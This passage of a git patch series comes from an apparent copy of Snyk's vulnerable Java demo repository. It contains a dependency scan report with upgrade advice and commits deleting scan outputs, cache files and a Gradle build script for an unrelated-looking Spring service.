+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.2.22.RELEASE (triggers upgrades to org.springframework:spring-beans@5.2.22.RELEASE)
+
+✗ Low severity vulnerability found on org.springframework:spring-context@3.2.6.RELEASE
+- desc: Improper Handling of Case Sensitivity
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.springframework:spring-web@3.2.6.RELEASE > org.springframework:spring-context@3.2.6.RELEASE
+Upgrade direct dependency org.springframework:spring-web@3.2.6.RELEASE to org.springframework:spring-web@5.0.0.RELEASE
+
+✗ Medium severity vulnerability found on org.zeroturnaround:zt-zip@1.12
+- desc: Arbitrary File Write via Archive Extraction (Zip Slip)
+- info: https://snyk.io/vuln/SNYK-JAVA-ORGZEROTURNAROUND-31681
+- from: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT > org.zeroturnaround:zt-zip@1.12
+Upgrade direct dependency org.zeroturnaround:zt-zip@1.12 to org.zeroturnaround:zt-zip@1.13
+
+Organisation: austin.doll
+Licenses enabled
+
+Tested 60 dependencies for known issues
+io.github.snyk:todolist-web-struts - No issues found after custom filtering
From cbb8697936069f3d64338698b0cae6452854069c Mon Sep 17 00:00:00 2001
From: dollav <146855949+dollav@users.noreply.github.com>
Date: Tue, 4 Mar 2025 12:06:26 -0500
Subject: [PATCH 21/38] push
---
.gradle/8.8/fileHashes/fileHashes.bin | Bin 18547 -> 18547 bytes
.gradle/8.8/fileHashes/fileHashes.lock | Bin 17 -> 17 bytes
.../buildOutputCleanup.lock | Bin 17 -> 17 bytes
.gradle/buildOutputCleanup/cache.properties | 4 +-
as.json | 0
boutput.json | 507 ------------------
build.gradle | 284 ----------
7 files changed, 2 insertions(+), 793 deletions(-)
delete mode 100644 as.json
delete mode 100644 boutput.json
delete mode 100644 build.gradle
diff --git a/.gradle/8.8/fileHashes/fileHashes.bin b/.gradle/8.8/fileHashes/fileHashes.bin index 3aa9dcacf9f29688729607b7da35724157196e72..0ee76a9e4f71653def7a520f4579a6c6830cfe2b 100644 GIT binary patch delta 27 ecmex7f${SM#tlgxf>V>^Oi_@% 
diff --git a/.gradle/buildOutputCleanup/buildOutputCleanup.lock b/.gradle/buildOutputCleanup/buildOutputCleanup.lock index 6b811c0daebe6dfdadeaec7b84c4bdd2727308e3..2d2c435ca065d42a440562246ed98d24770dbffd 100644 GIT binary patch literal 17 UcmZQxzE%C?_1RY+Ge7_{07A0`eE entries;\n", - "lineNumber": 22, - "lineChange": "none" - }, - { - "line": " private boolean dirty = false;\n", - "lineNumber": 23, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": " StorageProviderFile(Path path) throws IOException {\n", - "lineNumber": 24, - "lineChange": "none" - }, - { - "line": " this.path = path;\n", - "lineNumber": 26, - "lineChange": "none" - }, - { - "line": " this.gson = new Gson();\n", - "lineNumber": 27, - "lineChange": "none" - }, - { - "line": "\n", - "lineNumber": 28, - "lineChange": "none" - }, - { - "line": " if (Files.exists(path)) {\n", - "lineNumber": 29, - "lineChange": "none" - }, - { - "line": " entries = new HashMap<>();\n", - "lineNumber": 30, - "lineChange": "none" - }, - { - "line": " Arrays.stream(gson.fromJson(new String(Files.readAllBytes(path), StandardCharsets.UTF_8), POJOUserEntry[].class)).forEach(e -> entries.put(e.username, e));\n", - "lineNumber": 31, - "lineChange": "none" - }, - { - "line": " } else {\n", - "lineNumber": 32, - "lineChange": "none" - }, - { - "line": " if (!Files.exists(path.getParent())) {\n", - "lineNumber": 33, - "lineChange": "none" - }, - { - "line": " Files.createDirectories(path.getParent());\n", - "lineNumber": 34, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 35, - "lineChange": "none" - }, - { - "line": " entries = new HashMap<>();\n", - "lineNumber": 36, - "lineChange": "none" - }, - { - "line": " Files.createFile(path);\n", - "lineNumber": 37, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 38, - "lineChange": "none" - }, - { - "line": " }\n", - "lineNumber": 39, - "lineChange": "none" - }, - { - "line": "\n", - 
"lineNumber": 40,
- "lineChange": "none"
- },
- {
- "line": " @Override\n",
- "lineNumber": 41,
- "lineChange": "none"
- },
- {
- "line": " public boolean checkPassword(String username, String password) {\n",
- "lineNumber": 42,
- "lineChange": "none"
- },
- {
- "line": " if (entries.containsKey(username)) {\n",
- "lineNumber": 43,
- "lineChange": "none"
- },
- {
- "line": " return entries.get(username).password.equals(password);\n",
- "lineNumber": 43,
- "lineChange": "removed"
- },
- {
- "line": " return BCrypt.checkpw(password, entries.get(username).password);\n",
- "lineNumber": 44,
- "lineChange": "added"
- }
- ]
- }
- ],
- "exampleCommitDescriptions": [],
- "precision": "very-high",
- "repoDatasetSize": 2,
- "cwe": [
- "CWE-256"
- ]
- }
-}
diff --git a/build.gradle b/build.gradle
deleted file mode 100644
index 9b8da9a2b8..0000000000
--- a/build.gradle
+++ /dev/null
@@ -1,284 +0,0 @@
-buildscript {
- ext {
- projectName = 'hyrax'
- projectVersion = version
- buildNumber = System.env.BUILD_NUMBER ?: "1"
- arch = 'noarch'
- awaitilityVersion = '4.1.0'
- commonsCollection4Version = '4.4'
- commonsIOVersion = '2.8.0'
- commonsLang3Version = '3.12.0'
- ehcacheVersion = '3.8.1'
- geronimoSpecJavaMail = '1.8.4'
- googleCloudBomVersion = '26.42.0'
- gradleGitPropertiesVersion = '2.3.2'
- httpBuilderVersion = '0.6'
- httpClientVersion = '5.2.3'
- honeycombOpentelemetryVersion = '1.5.2'
- janinoVersion = '3.1.10'
- javaxCacheVersion = '1.1.1'
- lombokPluginVersion = '5.3.3.3'
- mockitoVersion = '3.12.3'
- snakeYamlVersion = '1.33'
- sonarQubePluginVersion = '2.6.2'
- springBootAdminVersion = '3.2.3'
- springBootVersion = '3.2.5'
- junitVersion = '5.10.1'
- testContainerVersion = '1.19.3'
- nexus = 'https://nexus.i.xmatters.com/repository/maven-public/'
- nexusPublishUsername = project.hasProperty("nexusPublishUsername") ? project.getProperty("nexusPublishUsername") : ""
- nexusPublishPassword = project.hasProperty("nexusPublishPassword") ? 
project.getProperty("nexusPublishPassword") : ""
- applicationDefaultJvmArgs = [
- "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5006"
- ]
- dockerOauthToken = 'gcloud -q auth print-access-token'.execute().text.trim()
- }
- repositories {
- maven { url "${nexus}" }
- mavenCentral()
- mavenLocal()
- maven { url "https://plugins.gradle.org/m2/" }
- }
-}
-plugins {
- id 'java'
- id 'maven-publish'
- id 'jacoco'
- id 'checkstyle'
- id 'org.springframework.boot' version "${springBootVersion}"
- id 'org.sonarqube' version "${sonarQubePluginVersion}"
- id 'com.gorylenko.gradle-git-properties' version "${gradleGitPropertiesVersion}"
- id 'io.freefair.lombok' version "${lombokPluginVersion}"
- id 'com.google.cloud.tools.jib' version '3.4.3'
-}
-java {
- toolchain {
- languageVersion = JavaLanguageVersion.of(17)
- }
-}
-ext.githash = 'git rev-parse --short HEAD'.execute().text.trim()
-ext.virtualHostVersion = version.replaceAll('(\\d+\\.\\d+\\.\\d+)(\\..*)?', '$1').replaceAll("\\.", "-")
-jacoco {
- toolVersion = "0.8.8"
-}
-repositories {
- mavenLocal()
- mavenCentral()
- maven { url "${nexus}" }
-}
-checkstyle {
- configFile = new File(rootDir, "/gradle/xMattersFormatAndImportChecks.xml")
- toolVersion = "5.9"
-}
-configurations.configureEach {
- resolutionStrategy.cacheChangingModulesFor 0, 'seconds'
- exclude module: "spring-boot-starter-tomcat"
- exclude module: "log4j"
- exclude module: "log4j-api"
- exclude module: "android-json"
-}
-dependencies {
- implementation platform("org.springframework.boot:spring-boot-dependencies:${springBootVersion}")
- implementation "org.springframework.boot:spring-boot-starter-web"
- implementation "org.springframework.boot:spring-boot-starter-jetty"
- implementation("org.springframework.boot:spring-boot-starter-webflux")
- implementation("org.springframework.boot:spring-boot-starter-oauth2-client")
- // tag::actuator[]
- implementation "org.springframework.boot:spring-boot-starter-actuator"
- // end::actuator[]
- 
implementation "org.springframework.boot:spring-boot-starter-security"
- implementation 'org.springframework.security:spring-security-oauth2-jose:6.2.1'
- constraints {
- implementation("org.yaml:snakeyaml:${snakeYamlVersion}") {
- because "Upgraded to ${snakeYamlVersion} because of CVE-2022-25857"
- }
- implementation("ch.qos.logback:logback-core:1.2.13") {
- because "Upgraded to 1.2.13 because of CVE-2023-6378"
- }
- implementation("ch.qos.logback:logback-classic:1.2.13") {
- because "Upgraded to 1.2.13 because of CVE-2023-6378"
- }
- }
- implementation("org.springframework.boot:spring-boot-starter-cache")
- implementation "org.springframework.boot:spring-boot-starter-cache"
- // see http://stackoverflow.com/questions/27935293/spring-ldap-example-requires-persistence for the reason for this
- implementation "org.springframework:spring-tx"
- implementation "org.codehaus.janino:janino"
- implementation("com.xmatters:springbok:${springbokVersion}") {
- exclude group: 'org.bouncycastle', module: 'bcprov-jdk15on'
- }
- implementation("com.xmatters:customer-config-client:4.347.0")
- implementation group: "com.xmatters", name: "xm-zuulproxy", version: "${xmZuulProxyVersion}", changing: true
- implementation("org.apache.httpcomponents.client5:httpclient5:${httpClientVersion}")
- implementation("org.apache.commons:commons-collections4:${commonsCollection4Version}")
- implementation("org.apache.commons:commons-lang3:${commonsLang3Version}")
- implementation 'io.prometheus:simpleclient:0.16.0'
- implementation "de.codecentric:spring-boot-admin-starter-client:${springBootAdminVersion}"
- implementation "com.xmatters:spring-boot-starter-xmatters:${xmSpringBootStarterVersion}"
- implementation "org.ehcache:ehcache:${ehcacheVersion}"
- implementation "javax.cache:cache-api:${javaxCacheVersion}"
- implementation "com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.17.1"
- implementation group: 'commons-io', name: 'commons-io', version: "${commonsIOVersion}"
- implementation 
'redis.clients:jedis:5.1.2'
- implementation "io.honeycomb:honeycomb-opentelemetry-sdk:${honeycombOpentelemetryVersion}"
- // Websocket/STOMP
- implementation "org.springframework.boot:spring-boot-starter-websocket"
- implementation 'org.springframework:spring-messaging'
- // Consul client library, may be used for service registration and Key/Value API
- implementation('com.ecwid.consul:consul-api:1.4.2') {
- exclude group: 'com.google.code.gson', module: 'gson'
- }
- implementation 'javax.xml.bind:jaxb-api:2.3.1'
- implementation 'org.glassfish.jaxb:jaxb-runtime:2.3.1'
- // SMTP for email bounce back
- implementation "org.apache.geronimo.javamail:geronimo-javamail_1.4_mail:${geronimoSpecJavaMail}"
- implementation 'com.sun.activation:javax.activation:1.2.0'
- // https://cloud.google.com/java/docs/bom
- implementation platform("com.google.cloud:libraries-bom:${googleCloudBomVersion}")
- implementation 'com.google.code.gson:gson'
- implementation 'com.google.guava:guava'
- implementation 'com.google.cloud:google-cloud-pubsub'
- implementation 'com.google.cloud:google-cloud-storage'
- implementation 'com.google.cloud:google-cloud-tasks'
- testImplementation "org.junit.vintage:junit-vintage-engine"
- testImplementation "org.springframework.boot:spring-boot-starter-test"
- testImplementation "org.mockito:mockito-inline:${mockitoVersion}"
- testImplementation "org.awaitility:awaitility:${awaitilityVersion}"
- testImplementation "com.github.codemonstur:embedded-redis:1.0.0"
- // Needed for the HyraxAuthApiTestController and its associated configuration. 
- testImplementation('org.springframework.security:spring-security-oauth2-authorization-server:1.2.1')
- testImplementation(platform('org.junit:junit-bom:5.10.2'))
- testImplementation('org.junit.jupiter:junit-jupiter')
- testRuntimeOnly('org.junit.platform:junit-platform-launcher')
- testImplementation(
- "com.redis:testcontainers-redis:2.0.1",
- "org.junit.jupiter:junit-jupiter-api",
- "org.junit.jupiter:junit-jupiter-params",
- "org.mockito:mockito-junit-jupiter:${mockitoVersion}",
- "org.springframework.boot:spring-boot-starter-test",
- "org.testcontainers:junit-jupiter:${testContainerVersion}",
- "org.testcontainers:testcontainers:${testContainerVersion}",
- )
-}
-sonarqube {
- properties {
- property "sonar.projectVersion", version.split('-')[0]
- property "sonar.language", "java"
- property "sonar.scm.disabled", "true"
- property "sonar.core.coveragePlugin", "Jacoco"
- }
-}
-test {
- // Checkstyle after test run
- finalizedBy = [jacocoTestReport, check]
- systemProperties = ["spring.profiles.active": "test, test-overrides"]
- useJUnitPlatform()
- testLogging {
- exceptionFormat = 'full'
- events "passed", "skipped", "failed", "standardOut", "standardError"
- }
-}
-tasks.withType(JavaCompile).configureEach {
- options.compilerArgs << '-Xlint:all,-cast,-deprecation,-processing,-rawtypes,-serial,-static,-unchecked' << '-Werror'
-}
-bootRun {
- gradle.taskGraph.whenReady { taskGraph ->
- if (taskGraph.hasTask(bootRun)) {
- def error = '''
-Standalone DEV is no longer supported. Please use dev in the cloud for local development.
-To discourage further use of this function, you will be presented with a bad dad joke each time you run it! 
-
-'''
- try {
- def response = 'curl https://icanhazdadjoke.com/'.execute().text
- error += '*' * response.length()
- error += '\n' + response + '\n'
- error += '*' * response.length()
- } catch (e) {
- error += 'Error 404 Dad Joke Not Found Searching Dad-A-Base'
- }
- throw new GradleException(error)
- }
- }
-}
-// We want to use the branch name as part of the GCR tag. However we don't want the raw branch name,
-// so we strip out symbols and non alpha-numerics. We also strip out git branch text that contains
-// remotes/origin or origin/, since we don't care about that.
-def sanitize = { input ->
- return input.replaceAll("[^A-Za-z0-9.]", "_").toLowerCase().replaceAll("remotes_origin_", "").replaceAll("origin_", "");
-}
-def buildNumber = System.env.BUILD_NUMBER ?: "1"
-def gcpGitbranch = 'git name-rev --name-only HEAD'.execute().text.trim()
-def githash = 'git rev-parse --short HEAD'.execute().text.trim()
-def gitbranchTag = sanitize(gcpGitbranch)
-def dockerTagShort = "${project.version}-${buildNumber}-${gitbranchTag}-${githash}"
-def dockerRepo = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax"
-def dockerTag = "${dockerRepo}:${dockerTagShort}"
-def buildType = System.env.BUILD_NUMBER ? "JENKINS" : "LOCAL"
-//Create gcpBuildVersion.properties file containing build information. This is for the build environment to pass onto
-// other upstream callers that are unable to figure out this information on their own. 
-tasks.register('versionProp') {
- onlyIf { true }
- doLast {
- new File("$project.buildDir/gcpBuildVersion.properties").text = """
-APPLICATION="hyrax"
-VERSION=${project.version}
-BUILD=${buildNumber}
-BRANCH=${gcpGitbranch}
-GIT_HASH=${githash}
-TAG_FULL=${dockerTag}
-TAG=${dockerTagShort}
-TIMESTAMP=${new Date().format('yyyy-MM-dd HH:mm:ss')}
-BUILD_TYPE=${buildType}
-"""
- }
-}
-generateGitProperties.finalizedBy versionProp
-jib {
- from {
- image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/base-containers/ibm-semeru-runtimes:xm-open-17.0.10_7-jre-jammy"
- }
- to {
- image = "us-central1-docker.pkg.dev/xmatters-eng-mgmt/apps/hyrax"
- tags = ['latest', dockerTagShort]
- }
- container {
- entrypoint = ["/entrypoint.sh"]
- mainClass = "com.xmatters.cloudagent.Application"
- ports = ['8083']
- containerizingMode = 'exploded'
- environment = [
- SERVICE : "hyrax",
- OTEL_JAVAAGENT_LOGGING: "application",
- OTEL_JAVAAGENT_DEBUG : "false",
- OTEL_METRICS_EXPORTER : "none",
- JVM_MEMORY : "-XX:MaxRAMPercentage=50",
- JVM_PARAMS : "-XshowSettings:vm -Xshareclasses:cacheDir=/opt/xmatters/jvmclassescache/hyrax,name=xmatters.hyrax,nonfatal -Xscmx300M",
- JVM_SSL : "-Djavax.net.ssl.sessionCacheSize=10000 -Dhttps.protocols=TLSv1.2 -Djdk.tls.client.protocols=TLSv1.2",
- JVM_GC : "-Xverbosegclog:/var/log/xmatters/hyrax/gc--%pid--%Y-%m-%d_%H-%M-%S.log,5,100000",
- HEAP_DUMP : "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=/var/log/xmatters/hyrax/heap.dump -Xdump:heap:events=user",
- THREAD_DUMP_OUTPUT : "-XX:+UnlockDiagnosticVMOptions -XX:+LogVMOutput -XX:LogFile=/var/log/xmatters/hyrax/thread.out",
- LOG_HOME : "/var/log/xmatters/hyrax",
- INFO_DEPENDENCIES_XMAPI_VERSION : "${xmApiCompatibility}".toString()
- ]
- labels = [
- maintainer: "mustafar@xmatters.com",
- app : "hyrax",
- owner : "Mustafar",
- version : "${version}",
- role : "api"
- ]
- extraDirectories {
- paths {
- path {
- from = file('docker/files')
- into = '/'
- includes = ['entrypoint.sh']
- }
- }
- 
permissions = [
- '/entrypoint.sh': '755'
- ]
- }
- }
-}
From dabf651c01a40e63618c241325d26b1d290a8f37 Mon Sep 17 00:00:00 2001
From: dollav <146855949+dollav@users.noreply.github.com>
Date: Tue, 4 Mar 2025 12:07:32 -0500
Subject: [PATCH 22/38] push
---
.dccache | 1 -
index.html | 1 -
output.json | 65575 --------------------------------------------
output.txt | 15 -
output2.json | 12 -
snyk.html | 828 -
test-command.json | 1421 -
test.json | 511 -
test2.json | 108 -
9 files changed, 68472 deletions(-)
delete mode 100644 .dccache
delete mode 100644 index.html
delete mode 100644 output.json
delete mode 100644 output.txt
delete mode 100644 output2.json
delete mode 100644 snyk.html
delete mode 100644 test-command.json
delete mode 100644 test.json
delete mode 100644 test2.json
diff --git a/.dccache b/.dccache
deleted file mode 100644
index 2dfbd1e49a..0000000000
--- a/.dccache
+++ /dev/null
@@ -1 +0,0 @@ -{"/Users/austindoll/Documents/GitHub/java-goof/.snyk":[263,1709233923336.8115,"4d5ddb18a63b61551137b8f6c2a53c131b013c740e9811f6aa33f3915dd4cbd6"],"/Users/austindoll/Documents/GitHub/java-goof/index.html":[664,1709234730093.0112,"b4b1fd34388ac1f26eb24ebcaff6dbb1a68bf5fe408c038644f2f675380b9f3d"],"/Users/austindoll/Documents/GitHub/java-goof/pom.xml":[847,1707749068003.2305,"da6ee224cb97110767ecdfd388ff49d09c79cabb83148cbc3c2d00247a99d5a9"],"/Users/austindoll/Documents/GitHub/java-goof/snyk.html":[46685,1708959251167.5747,"430bcf566f778c2cdfa1c3f36a8b0e14e6e65c43caacf812db410839fe091ff4"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/pom.xml":[813,1707749068003.1423,"e3ab9c5fd3179257a8c7aabd94eaea5eaa5da23a5a61a7395e06ec0d4d29093c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/pom.xml":[3789,1707749068011.1064,"ca348a55eee0c2c6b76fd19daa5001a2ae8a74f7584132d07f7fcc5b9d81a1cd"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/web.xml":[163602,1707749068031.4702,"14fbfdf6f89135f18a36425670fc0549a5919415639b72448f1301858000e7c1"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/pom.xml":[1522,1707749068001.598,"849085e013ad19cc95f39178fa254c7e98c69c7539550bfc12ed4dfe163a25de"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/pom.xml":[2629,1707749068002.589,"69176bc5c5aed490d7cdeb4c3a6bf06f25d8e3609b2824d7cd7da97741f697ba"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/pom.xml":[3597,1707749068017.0205,"09fed335bb1308ee3b405e6eb7cee510fc64e96527c59e933912d047ee60dc0d"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-common/pom.xml":[2430,1707749068020.6174,"71757d958b575723f0010daa01d6e579df879a16c7160f779c0f92102af5b894"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/pom.xml":[3468,1707749068023.351,"61ef52abd4ad31c5cbdf91d0ed533c96dd7fb2d6bebdabf4a625a4fd6fc80c55"],"/User
s/austindoll/Documents/GitHub/java-goof/todolist-goof/exploits/tomcat-rce/exploit.py":[6127,1707749068006.9976,"1044e4d9d2f0035f2a1ceb0d9cb6f2b290917ee311d7e605352b4d982547bb98"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/about.html":[4688,1707749068013.4434,"e0396d1712516cf3a477e7143c8be27c608da18c6929d07d4dfae0043ecf5f51"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/account.html":[10141,1707749068013.62,"7bfc9a8f3e554519afa0483021bda4f0e1340444e41579d03cf42b9e73a445ec"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/createTodo.html":[5494,1707749068013.7979,"7fb7501b2dfc287ea26b53e44154eb91f1256a347d9d578ca6a34b100e6b4299"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/home.html":[16033,1707749068013.969,"20d27904c27c8a764dbdf142006895805d3d27b4b428e63cdcea81450b561031"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/index.html":[2636,1707749068014.067,"104bbef8fe73eb729f086317f1c7b16e4ead3eecb1aa7431728c9bba4a59e02e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login-error.html":[3404,1707749068014.147,"92e9656c27429357777f74cb85c7446168962ea38ff4cc906c02696694e0f30b"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/login.html":[3201,1707749068014.241,"a547c1172ac5214ec936a5bcfc2f7ae8375eca78e19a86c58add1d0a37262a3f"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/register.html":[4215,1707749068014.373,"1eb6f41a808801f5881fc573e7110e6ad682ca17d8126609025e73e67a69b2a8"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/searchTodo.html":[11497,1707749068014.504,"0dd8ffc0a703279252eff55566765326701d297c34bc4d721912b6c6224d81a5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/updateTodo.html":[6468,1707749068016.7961,"aeea0bd71e519e04d3aa60cfe27868803f07bb
19f4c9212fb90d1bf0ff6af714"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-client/src/main/java/Main.java":[1581,1707749068001.87,"771ba599971e26873da00309f2e5f2d764fcc0edbe2d1c345841891aa3588a26"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Evil.java":[496,1707749068002.8047,"51919d812e029ba3072f606a02420fc15bf479506dfe8075a7042adca8923993"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Server.java":[7682,1707749068002.9707,"190e04c4ba5e3750e4fb8ff2f87c06b88a9b2cd7403ddb9458c9d4d3072d0aff"],"/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server/src/main/java/Vandalize.java":[632,1707749068003.0623,"691d442e5a144bc4cc10204ebbf253abfa45ec13699d87b806c503b435850dc5"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/resources/struts.xml":[8029,1707749068025.5425,"34c773e0dfa168a8d9947cf3e0fd13282fde503cadd3dd959b72c2cae8afe72e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap-datepicker.js":[11683,1707749068016.2554,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/bootstrap.min.js":[28631,1707749068016.3838,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/src/site/template/static/js/jquery-1.10.2.min.js":[93107,1707749068016.646,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/persistence.xml":[766,1707749068019.1663,"5fd1eca212d0b30f490d98338bf56550394060c0c4342a1bcf6ad6643b787428"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/web.xml":[1316,1707749068028.074,"e3525f343fa0a2fe1f3df
ea1bcddb69649d71eae9bda52ae2b118113f6cb574a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/application-context.xml":[868,1707749068019.3025,"b60c87281e4808b5d0f12a314c51d7cd44dd0a057a2378f925deb2e7b13f3d5e"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/resources/META-INF/spring/infrastructure-context.xml":[2335,1707749068019.3816,"c9a996e921025ae765b092e5739a03af219548a902852670444144d09d58f194"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/about.jsp":[1868,1707749068025.8013,"eedab2c226de89d4d4d85f9ed044d628cf6070e616ad29e9f03f83752656a691"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/error.jsp":[653,1707749068026.3748,"6106cdf7b628fa2aac9a04a3d268be6f60f3d5dc1ab9a1d336f54bbbd74f6174"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/index.jsp":[1861,1707749068026.4595,"01dc1dd68bb95ee1f99ef396b6fcb8a098c5f911d581a4885a8be4fc87ebd91a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap-datepicker.js":[11683,1707749068030.258,"b03662f2b02be2cb7bcc3c387ef24a950414103b056d8d6c6ff461b8f4d7b01c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/bootstrap.min.js":[28631,1707749068030.3862,"a515a82292b34bdde3447113634d5d496039ffd4d6a0c7382586f3c24e582645"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/static/js/jquery-1.10.2.min.js":[93107,1707749068031.0234,"0ba081f546084bd5097aa8a73c75931d5aa1fc4d6e846e53c21f98e6a1509988"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/create.jsp":[2544,1707749068026.6067,"b2b33b8980b011d4968751de2f7a9850115f7ab9
a56bb49e7dea24fc3c973e23"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/search.jsp":[4454,1707749068026.7534,"1cb05693027f12118e9512a3e01a3f921b84f59e00a77ce94c059acf9db13dc2"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/update.jsp":[3605,1707749068027.0662,"c449f35943ee90d512149c3d1b26347c3750c1859fc8c537b4f0d10606ba4700"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/todo/upload.jsp":[1466,1707749068027.223,"0597d3a625750805184ddeccbe1f494128c4964ff6239e547159c624b7e59e0a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/account.jsp":[7316,1707749068027.4456,"3a06613691bab220ee216c8e5774adbedd84ced7e595109291293c3ad28ed49c"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/files.jsp":[1585,1707749068027.5571,"461382d325567c4c669cef5176148d9e14be127fc4793652542612e372eb5432"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/home.jsp":[4828,1707749068027.7083,"b0cd89cd2c9d5a9dacb4e285ff924078315d9c937d6ea1a3605a538bbe05b0eb"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/login.jsp":[2108,1707749068027.8154,"fef8f3f5c975a6a4912b5708b8b5cd3409b6d749569f7eca1d7b9f7793f8766a"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-web-struts/src/main/webapp/WEB-INF/views/user/register.jsp":[3249,1707749068027.9233,"5495c3acf8521dc6e68b66fb1e68ce835316d11cebf02d73e2407b23dd5f1dc9"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/TodoServiceTest.java":[2061,1707749068020.2898,"97a4d9a387a2b063bed68c376282b7844fd77e1a1ab6bfa9f566fb6
c66815ab3"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/test/java/io/github/todolist/core/UserServiceTest.java":[1911,1707749068020.393,"f08674cb5b00b45c4f2c0f5478b62a8d6da2e610ebf928d95d0f162ccf6b25f1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/Statics.java":[302,1707749068017.4575,"faf8ae30c8c00074f924d68192efea8ddf173d772e3857987eebc8474af8a025"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Priority.java":[1400,1707749068017.6262,"fbcf56cefa0166697104dc80f3cd9454e0a9ed64f32bf1f51b8ff52c61ade443"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/Todo.java":[5142,1707749068017.7947,"e511ab0dcf0d6d60e2a08912558a03d2f3c2b4246cb374fc899c7375707a8ba6"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/domain/User.java":[2744,1707749068017.8948,"82a4b1757798282d230b769625371b91f2a8892ad313f088159147548a511ce1"],"/Users/austindoll/Documents/GitHub/java-goof/todolist-goof/todolist-core/src/main/java/io/github/todolist/core/repository/api/TodoRepository.java":[2606,1707749068018.112,"a4b3b4808634f298057a0a480b55a279d4387af97bf285ecaf